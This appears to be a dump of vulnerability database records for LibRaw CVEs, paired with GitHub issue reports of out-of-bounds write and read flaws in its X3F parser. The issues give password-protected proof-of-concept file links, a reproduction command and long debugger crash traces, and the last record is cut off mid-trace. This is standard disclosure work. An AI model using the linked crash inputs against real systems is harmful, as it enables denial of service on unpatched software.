[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/11c4db253ef2c9bb44247b578f5caa57c66a1eeb" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/272" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/11c4db253ef2c9bb44247b578f5caa57c66a1eeb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/272" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibRaw/LibRaw/issues/272
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description** There is an out-of-bounds write vulnerability within the "new_node()" function (libraw\src\x3f\x3f_utils_patched.cpp). **Steps to Reproduce** poc (password: 0xfoxone): https://drive.google.com/open?id=1SGItp-hBZXEgrPErI6URiRkqUOT5J9In cmd: magick.exe convert poc.X3F new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: C:\ImageMagick-7.0.9-16\VisualMagick\bin\magick.exe convert C:\poc.X3F C:\new.png Symbol search path is: srv* Executable search path is: ModLoad: 00000000`00830000 00000000`00840000 magick.exe ModLoad: 00007ffe`62840000 00007ffe`62a30000 ntdll.dll ModLoad: 00000000`77260000 00000000`773fa000 ntdll.dll ModLoad: 00000000`01200000 00000000`01271000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x9210: page heap enabled with flags 0x3. ModLoad: 00007ffe`60bc0000 00007ffe`60c15000 C:\WINDOWS\System32\wow64.dll ModLoad: 00007ffe`60b40000 00007ffe`60bbd000 C:\WINDOWS\System32\wow64win.dll (9210.8cf4): Break instruction exception - code 80000003 (first chance) ntdll!LdrInitShimEngineDynamic+0x35c: 00007ffe`6291121c cc int 3 0:000> g ModLoad: 00000000`77250000 00000000`77259000 C:\WINDOWS\System32\wow64cpu.dll ModLoad: 00000000`71620000 00000000`71683000 C:\WINDOWS\SysWOW64\verifier.dll Page heap: pid 0x9210: page heap enabled with flags 0x3. ModLoad: 00000000`74b20000 00000000`74c00000 C:\WINDOWS\SysWOW64\KERNEL32.DLL ModLoad: 00000000`75500000 00000000`756fd000 C:\WINDOWS\SysWOW64\KERNELBASE.dll ModLoad: 00000000`70750000 00000000`7099e000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00000000`714b0000 00000000`71611000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00000000`74ce0000 00000000`74e77000 C:\WINDOWS\SysWOW64\USER32.dll ModLoad: 00000000`75eb0000 00000000`75ec7000 C:\WINDOWS\SysWOW64\win32u.dll ModLoad: 00000000`70ff0000 00000000`71163000 C:\WINDOWS\SysWOW64\ucrtbased.dll ModLoad: 00000000`71490000 00000000`714ac000 C:\WINDOWS\SysWOW64\VCRUNTIME140D.dll ModLoad: 00000000`71460000 00000000`71488000 C:\WINDOWS\SysWOW64\VCOMP140D.DLL ModLoad: 00000000`76fe0000 00000000`77001000 C:\WINDOWS\SysWOW64\GDI32.dll ModLoad: 00000000`75d30000 00000000`75e8a000 C:\WINDOWS\SysWOW64\gdi32full.dll ModLoad: 00000000`77150000 00000000`771cc000 C:\WINDOWS\SysWOW64\msvcp_win.dll ModLoad: 00000000`76720000 00000000`7683f000 C:\WINDOWS\SysWOW64\ucrtbase.dll ModLoad: 00000000`75480000 00000000`754f9000 C:\WINDOWS\SysWOW64\ADVAPI32.dll ModLoad: 00000000`764a0000 00000000`7655f000 C:\WINDOWS\SysWOW64\msvcrt.dll ModLoad: 00000000`771d0000 00000000`77246000 C:\WINDOWS\SysWOW64\sechost.dll ModLoad: 00000000`77010000 00000000`770cb000 C:\WINDOWS\SysWOW64\RPCRT4.dll ModLoad: 00000000`74a30000 00000000`74a50000 C:\WINDOWS\SysWOW64\SspiCli.dll ModLoad: 00000000`74a20000 00000000`74a2a000 C:\WINDOWS\SysWOW64\CRYPTBASE.dll ModLoad: 00000000`765f0000 00000000`7664f000 C:\WINDOWS\SysWOW64\bcryptPrimitives.dll ModLoad: 00000000`71440000 00000000`7145e000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00000000`70680000 00000000`70750000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00000000`70f80000 00000000`70fe6000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00000000`71390000 00000000`713aa000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00000000`70bb0000 00000000`70c2c000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00000000`6fd60000 00000000`6ffee000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00000000`75f20000 00000000`7649a000 C:\WINDOWS\SysWOW64\SHELL32.dll ModLoad: 00000000`76850000 00000000`7688b000 C:\WINDOWS\SysWOW64\cfgmgr32.dll ModLoad: 00000000`71360000 00000000`71381000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00000000`76560000 00000000`765e4000 C:\WINDOWS\SysWOW64\shcore.dll ModLoad: 00000000`75840000 00000000`75ab5000 C:\WINDOWS\SysWOW64\combase.dll ModLoad: 00000000`769b0000 00000000`76f75000 C:\WINDOWS\SysWOW64\windows.storage.dll ModLoad: 00000000`74c50000 00000000`74c67000 C:\WINDOWS\SysWOW64\profapi.dll ModLoad: 00000000`74c90000 00000000`74cd3000 C:\WINDOWS\SysWOW64\powrprof.dll ModLoad: 00000000`75700000 00000000`7570d000 C:\WINDOWS\SysWOW64\UMPDC.dll ModLoad: 00000000`75ed0000 00000000`75f14000 C:\WINDOWS\SysWOW64\shlwapi.dll ModLoad: 00000000`766c0000 00000000`7671e000 C:\WINDOWS\SysWOW64\WS2_32.dll ModLoad: 00000000`74f10000 00000000`74f1f000 C:\WINDOWS\SysWOW64\kernel.appcore.dll ModLoad: 00000000`75e90000 00000000`75ea3000 C:\WINDOWS\SysWOW64\cryptsp.dll ModLoad: 00000000`75ac0000 00000000`75bb7000 C:\WINDOWS\SysWOW64\ole32.dll ModLoad: 00000000`74920000 00000000`74952000 C:\WINDOWS\SysWOW64\IPHLPAPI.DLL ModLoad: 00000000`74880000 00000000`74911000 C:\WINDOWS\SysWOW64\DNSAPI.dll ModLoad: 00000000`76840000 00000000`76847000 C:\WINDOWS\SysWOW64\NSI.dll (9210.8cf4): WOW64 breakpoint - code 4000001f (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ntdll_77260000!LdrInitShimEngineDynamic+0x6e2: 7730e9e2 cc int 3 0:000:x86> g ModLoad: 75810000 75835000 C:\WINDOWS\SysWOW64\IMM32.DLL ModLoad: 71430000 7143e000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 70520000 70674000 C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 70320000 703d9000 C:\WINDOWS\SysWOW64\MSVCP140D.dll (9210.8cf4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!new_node+0x41: 705dbf21 c74208ffffffff mov dword ptr [edx+8],0FFFFFFFFh ds:002b:117d0000=???????? 0:000:x86> k ChildEBP RetAddr 00 00fa4198 705cab75 CORE_DB_libraw_!new_node+0x41 [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 715] 01 00fa41bc 705e2f65 CORE_DB_libraw_!add_code_to_tree+0x75 [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 736] 02 00fa41e8 705ed80d CORE_DB_libraw_!populate_true_huffman_tree+0x95 [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 762] 03 00fa4234 705ec86e CORE_DB_libraw_!x3f_load_true+0x36d [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1334] 04 00fa4254 705ec28c CORE_DB_libraw_!x3f_load_image+0xbe [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1509] 05 00fa426c 705ecd80 CORE_DB_libraw_!x3f_load_data+0x6c [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 2058] 06 00fa42e8 705e86f5 CORE_DB_libraw_!LibRaw::x3f_load_raw+0x50 [c:\imagemagick-7.0.9-16\libraw\src\x3f\x3f_parse_process.cpp @ 579] 07 00fa4464 705f0abc CORE_DB_libraw_!LibRaw::unpack+0xa25 [c:\imagemagick-7.0.9-16\libraw\src\decoders\unpack.cpp @ 282] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll 08 00fa4470 71431be6 CORE_DB_libraw_!libraw_unpack+0x2c [c:\imagemagick-7.0.9-16\libraw\src\libraw_c_api.cpp @ 136] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll 09 00fa64c8 707b25a3 IM_MOD_DB_DNG_!ReadDNGImage+0x466 [c:\imagemagick-7.0.9-16\imagemagick\coders\dng.c @ 425] 0a 00fab5e0 707b3b2c CORE_DB_MagickCore_!ReadImage+0x543 [c:\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for C:\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll 0b 00fac624 714dd449 CORE_DB_MagickCore_!ReadImages+0x2fc [c:\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 927] 0c 00fadb84 71548b4d CORE_DB_MagickWand_!ConvertImageCommand+0xd29 [c:\imagemagick-7.0.9-16\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 0d 00faec40 008313de CORE_DB_MagickWand_!MagickCommandGenesis+0x2cd [c:\imagemagick-7.0.9-16\imagemagick\magickwand\mogrify.c @ 185] 0e 00fafd74 00831626 magick!MagickMain+0x3de [c:\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 149] 0f 00fafd94 00831d2e magick!wmain+0x46 [c:\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 195] 10 00fafda8 00831c10 magick!invoke_main+0x1e [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 79] 11 00fafe00 00831abd magick!__scrt_common_main_seh+0x150 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 12 00fafe08 00831d48 magick!__scrt_common_main+0xd [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 13 00fafe10 74b36359 magick!wmainCRTStartup+0x8 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] WARNING: Stack unwind information not available. Following frames may be wrong. 14 00fafe20 772c7b74 KERNEL32!BaseThreadInitThunk+0x19 15 00fafe7c 772c7b44 ntdll_77260000!RtlGetAppContainerNamedObjectPath+0xe4 16 00fafe8c 00000000 ntdll_77260000!RtlGetAppContainerNamedObjectPath+0xb4 **System Configuration** - ImageMagick version: Version: ImageMagick-7.0.9-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
Libraw "new_node()" Out-of-bounds Write Vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/272/comments
1
2020-04-03T17:35:32Z
2020-06-15T14:40:35Z
https://github.com/LibRaw/LibRaw/issues/272
593,536,465
272
4,075
CVE-2020-35531
2022-09-01T18:15:08.820
In LibRaw, an out-of-bounds read vulnerability exists within the get_huffman_diff() function (libraw\src\x3f\x3f_utils_patched.cpp) when reading data from an image file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/d75af00681a74dcc8b929207eb895611a6eceb68" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/270" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/d75af00681a74dcc8b929207eb895611a6eceb68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/270" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibRaw/LibRaw/issues/270
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description** An out-of-bounds read vulnerability exists within the "get_huffman_diff()" function (libraw\src\x3f\x3f_utils_patched.cpp) when parsing a crafted X3F file. **Steps to Reproduce** (poc archive password= girlelecta): https://drive.google.com/file/d/1Yhqo6idPqWMisvPKrlzjsUKRApHmz2M_/view cmd: magick.exe convert poc1.X3F new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\magick.exe convert E:\Workspace\poc1.X3F E:\Workspace\new.png ************* Path validation summary ************** Symbol search path is: srv* Executable search path is: ModLoad: 00007ff6 5a870000 00007ff6 5a882000 magick.exe ModLoad: 00007ffe c1500000 00007ffe c16f0000 ntdll.dll ModLoad: 00007ffe a8a10000 00007ffe a8a81000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x2264: page heap enabled with flags 0x3. ModLoad: 00007ffe bf9a0000 00007ffe bfa52000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 00007ffe be510000 00007ffe be7b3000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 00007ffe 82020000 00007ffe 822a9000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00007ffe c0ea0000 00007ffe c1034000 C:\WINDOWS\System32\USER32.dll ModLoad: 00007ffe 92500000 00007ffe 926c9000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00007ffe bf580000 00007ffe bf5a1000 C:\WINDOWS\System32\win32u.dll ModLoad: 00007ffe c0910000 00007ffe c0936000 C:\WINDOWS\System32\GDI32.dll ModLoad: 00007ffe be7c0000 00007ffe be954000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 00007ffe a8d20000 00007ffe a8d42000 C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll ModLoad: 00007ffe 8b440000 00007ffe 8b5fb000 C:\WINDOWS\SYSTEM32\ucrtbased.dll ModLoad: 00007ffe beab0000 00007ffe beb4e000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 00007ffe beb80000 00007ffe bec7a000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 00007ffe c1280000 00007ffe c1323000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 00007ffe c0bb0000 00007ffe c0c4e000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 00007ffe c0cc0000 00007ffe c0d57000 C:\WINDOWS\System32\sechost.dll ModLoad: 00007ffe c02a0000 00007ffe c03c0000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 00007ffe a88b0000 00007ffe a88d7000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00007ffe a8220000 00007ffe a833f000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00007ffe a8190000 00007ffe a8216000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00007ffe a7a50000 00007ffe a7af0000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00007ffe a87f0000 00007ffe a881a000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00007ffe a87c0000 00007ffe a87e3000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00007ffe 81ce0000 00007ffe 8201b000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00007ffe bfa60000 00007ffe c0145000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 00007ffe bf530000 00007ffe bf57a000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 00007ffe c0b00000 00007ffe c0ba9000 C:\WINDOWS\System32\shcore.dll ModLoad: 00007ffe bf5b0000 00007ffe bf8e6000 C:\WINDOWS\System32\combase.dll ModLoad: 00007ffe be490000 00007ffe be510000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 00007ffe bec80000 00007ffe bf3ff000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 00007ffe c1430000 00007ffe c149f000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 00007ffe be470000 00007ffe be48f000 C:\WINDOWS\System32\profapi.dll ModLoad: 00007ffe be400000 00007ffe be44a000 C:\WINDOWS\System32\powrprof.dll ModLoad: 00007ffe be3d0000 00007ffe be3e0000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 00007ffe c1220000 00007ffe c1272000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 00007ffe be3e0000 00007ffe be3f1000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 00007ffe bf510000 00007ffe bf527000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 00007ffe c1040000 00007ffe c1196000 C:\WINDOWS\System32\ole32.dll ModLoad: 00007ffe bd950000 00007ffe bd98a000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe bd990000 00007ffe bda5a000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe c0220000 00007ffe c0228000 C:\WINDOWS\System32\NSI.dll (2264.3f58): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffe c15d121c cc int 3 0:000> g ModLoad: 00007ffe c1400000 00007ffe c142e000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffe b4720000 00007ffe b472f000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffe 81b30000 00007ffe 81cdb000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffe 9a850000 00007ffe 9a946000 C:\WINDOWS\SYSTEM32\MSVCP140D.dll (2264.3f58): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!get_bit+0x34: 00007ffe 81c20bb4 0fb600 movzx eax,byte ptr [rax] ds:0000014b bf836da4=?? 0:000> k Child-SP RetAddr Call Site 00 00000038 853e32a0 00007ffe 81c219fe CORE_DB_libraw_!get_bit+0x34 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 857] 01 00000038 853e32c0 00007ffe 81c2251a CORE_DB_libraw_!get_huffman_diff+0x6e [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1017] 02 00000038 853e3320 00007ffe 81c22352 CORE_DB_libraw_!huffman_decode_row+0x13a [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1055] 03 00000038 853e33f0 00007ffe 81c37cee CORE_DB_libraw_!huffman_decode+0xb2 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1095] 04 00000038 853e3470 00007ffe 81c37a93 CORE_DB_libraw_!x3f_load_huffman_compressed+0x21e [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1411] 05 00000038 853e34e0 00007ffe 81c37ecd CORE_DB_libraw_!x3f_load_huffman+0x283 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1468] 06 00000038 853e3550 00007ffe 81c37768 CORE_DB_libraw_!x3f_load_image+0x12d [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1514] 07 00000038 853e35b0 00007ffe 81c38504 CORE_DB_libraw_!x3f_load_data+0x88 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 2059] 08 00000038 853e35f0 00007ffe 81c33628 CORE_DB_libraw_!LibRaw::x3f_load_raw+0x64 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_parse_process.cpp @ 579] 09 00000038 853e36e0 00007ffe 81c3d358 CORE_DB_libraw_!LibRaw::unpack+0xc18 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\decoders\unpack.cpp @ 283] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll 0a 00000038 853e38a0 00007ffe b4721989 CORE_DB_libraw_!libraw_unpack+0x48 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\libraw_c_api.cpp @ 136] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll 0b 00000038 853e38e0 00007ffe 820783b7 IM_MOD_DB_DNG_!ReadDNGImage+0x479 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\coders\dng.c @ 425] 0c 00000038 853e59f0 00007ffe 82079af3 CORE_DB_MagickCore_!ReadImage+0x5e7 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll 0d 00000038 853eac10 00007ffe 9253aac3 CORE_DB_MagickCore_!ReadImages+0x393 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 927] 0e 00000038 853ebcc0 00007ffe 925d3fe8 CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 0f 00000038 853ed810 00007ff6 5a8714ea CORE_DB_MagickWand_!MagickCommandGenesis+0x338 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickwand\mogrify.c @ 185] 10 00000038 853ee980 00007ff6 5a871693 magick!MagickMain+0x4ea [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 149] 11 00000038 853efbf0 00007ff6 5a871f24 magick!wmain+0x43 